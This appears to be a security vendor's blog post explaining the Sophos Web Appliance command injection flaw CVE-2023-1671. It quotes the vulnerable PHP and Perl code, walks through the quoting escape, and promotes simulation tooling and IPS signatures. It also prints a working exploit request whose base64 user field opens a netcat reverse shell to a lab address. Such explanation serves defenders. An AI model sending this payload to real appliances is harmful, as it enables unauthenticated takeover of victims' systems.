CVE-2023-1671: Sophos Command Injection Vulnerability Exploited in the Wild


On November 16, 2023, the Cybersecurity and Infrastructure Security Agency (CISA) added the Sophos Web Appliance command injection vulnerability CVE-2023-1671 to its Known Exploited Vulnerabilities (KEV) catalog [1]. Although it was disclosed in April 2023, CVE-2023-1671 is still being actively exploited in the wild. The vulnerability has a CVSS score of 9.8 (Critical).

In this blog post, we explain the Sophos CVE-2023-1671 vulnerability and how organizations can defend against attacks that exploit it.


Sophos Web Appliance CVE-2023-1671 Explained

Sophos Web Appliance (SWA) is used by organizations to filter incoming web traffic to protect against web-based threats. It is often used for content filtering, threat protection, and data loss prevention (DLP). Sophos Web Appliance is placed at the network perimeter or specified network segments where web traffic can be analyzed and filtered.

In April 2023, Sophos disclosed a pre-authentication command injection vulnerability affecting Sophos Web Appliance. The vulnerability allows adversaries to execute arbitrary commands without authenticating. CVE-2023-1671 affects Sophos Web Appliance versions prior to 4.3.10.4. SWA receives updates automatically by default, and Sophos released a fix at the time of disclosure. Although SWA has an auto-update feature and the product reached End-of-Life on July 20, 2023, adversaries are still exploiting vulnerable SWA instances in the wild. Organizations are advised to patch vulnerable SWA instances and keep the device behind a firewall so that it is not reachable from the public internet.

How Does the Sophos Web Appliance CVE-2023-1671 Exploit Work?

The Sophos CVE-2023-1671 vulnerability stems from a vulnerable component, the warn-proceed handler. The weakness is classified as CWE-77 (Improper Neutralization of Special Elements used in a Command) and lets unauthenticated adversaries inject shell commands through manipulated input. User input sent to "/index.php?c=blocked" in an HTTP POST request is routed to UsrBlocked.php and passed through the escapeshellarg function [2].

if($_GET['action'] == 'continue') {
    // The base64-encoded user field is used whenever a non-empty plain user value is present
    if(strlen(trim($_POST['user'])) > 0)
        $user = base64_decode($_POST['user_encoded']);
    else
        $user = $_POST['client-ip'];
    if($user == '-') $user = $_POST['client-ip'];
    $user = escapeshellarg($user);
    if($_POST['args_reason'] == 'filetypewarn') {
        $key = $_POST['url'];
        $packer = '/opt/ws/bin/ftsblistpack';
        $value = $_POST['filetype'];
    }
    else {
        $key = $_POST['domain'];
        $packer = '/opt/ws/bin/sblistpack';
        $catParts = explode("|",$_POST['raw_category_id']);
        $value = $catParts[0];
    }

    $key = escapeshellarg($key);
    $value = escapeshellarg($value);
    $this->log->write("DEBUG","cmd = '$packer $key $user $value'");
    // escapeshellarg() only protects this shell invocation; the packer script receives the raw values
    $result = shell_exec("$packer $key $user $value 2>&1");

Code section where UsrBlocked.php handles user inputs

When an attacker sends a base64-encoded command in the user_encoded field of the POST request, the decoded value is handed to ftsblistpack. escapeshellarg quotes it safely for the shell_exec call in PHP, but that shell removes the quoting before the value reaches the Perl script, which then interpolates it into a second shell command where it is only wrapped in single quotes. A single quote in the decoded input closes that quoting, and whatever follows is executed as a shell command.

    open my $flag, ">", "$flag_file_dir/$proceeded_flag_file" or die "Open file [$flag_file_dir/$proceeded_flag_file] failed" and $rc++;
    close($flag);

    # Arguments are interpolated into a single-quoted shell string; a quote inside $user breaks out of it
    $rc += system("$sblistpack '$uri' '$user' '$filetype' '$filein' '$fileout'");
}
exit $rc;

The system function in the ftsblistpack Perl script before the patch

An example payload is given below. It executes a reverse shell connection to the test machine.

— Base-64 encoded

POST /index.php?c=blocked&action=continue HTTP/1.1
args_reason=filetypewarn&url=2XcjgUjbpYUmeBZwMmuiC9x9Tdy&filetype=2XcjgUjbpYUmeBZwMmuiC9x9Tdy&user=2XcjgUjbpYUmeBZwMmuiC9x9Tdy&user_encoded=JztuYyAtZSAvYmluL3NoIDE5Mi4xNjguMS40MiA0NDQ0ICM=

— Base-64 decoded

POST /index.php?c=blocked&action=continue HTTP/1.1
args_reason=filetypewarn&url=2XcjgUjbpYUmeBZwMmuiC9x9Tdy&filetype=2XcjgUjbpYUmeBZwMmuiC9x9Tdy&user=2XcjgUjbpYUmeBZwMmuiC9x9Tdy&user_encoded=';nc -e /bin/sh 192.168.1.42 4444 #

How Does Picus Help Simulate Sophos CVE-2023-1671 Attacks?

We strongly suggest simulating the Sophos CVE-2023-1671 vulnerability to test the effectiveness of your security controls against sophisticated cyber attacks using the Picus Complete Security Validation Platform. You can also test your defenses against other vulnerability exploitation attacks, such as Log4Shell, Looney Tunables, and ProxyShell, within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for Sophos CVE-2023-1671 vulnerability exploitation attacks:

Threat ID | Threat Name                              | Attack Module
34756     | Sophos Web Appliance Web Attack Campaign | Web Application

Picus also provides actionable mitigation content. Picus Mitigation Library includes prevention signatures that address the Sophos CVE-2023-1671 vulnerability and other vulnerability exploitation attacks in preventive security controls. Picus Labs has currently validated the following signatures for the Sophos CVE-2023-1671 vulnerability:

Security Control     | Signature ID                   | Signature Name
Checkpoint NGFW      | asm_dynamic_prop_CVE_2023_1671 | Sophos Web Appliance Command Injection (CVE-2023-1671)
Cisco FirePower      | 1.61794.1                      | SERVER-WEBAPP Sophos Virtual Web Appliance unauthenticated command injection attempt
Fortigate IPS        | 52919                          | web_app3: Sophos.Web.Appliance.warn-proceed.Command.Injection
Imperva SecureSphere |                                | CVE-2023-1671: Sophos Web Appliance Pre-Auth RCE
McAfee               | 0x452e5000                     | HTTP: Sophos Web-Appliance Pre-Authentication Command Injection Vulnerability (CVE-2023-1671)
Palo Alto            | 93746                          | Sophos Web Appliance Command Injection Vulnerability
Snort                | 1.61794.1                      | SERVER-WEBAPP Sophos Virtual Web Appliance unauthenticated command injection attempt

Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Complete Security Validation Platform.

References

[1] "CISA Adds Three Known Exploited Vulnerabilities to Catalog," Cybersecurity and Infrastructure Security Agency (CISA). Available: https://www.cisa.gov/news-events/alerts/2023/11/16/cisa-adds-three-known-exploited-vulnerabilities-catalog. [Accessed: Nov. 22, 2023]

[2] "Analysis of Pre-Auth RCE in Sophos Web Appliance (CVE-2023-1671) - Blog," VulnCheck. Available: https://vulncheck.com/blog/cve-2023-1671-analysis. [Accessed: Nov. 22, 2023]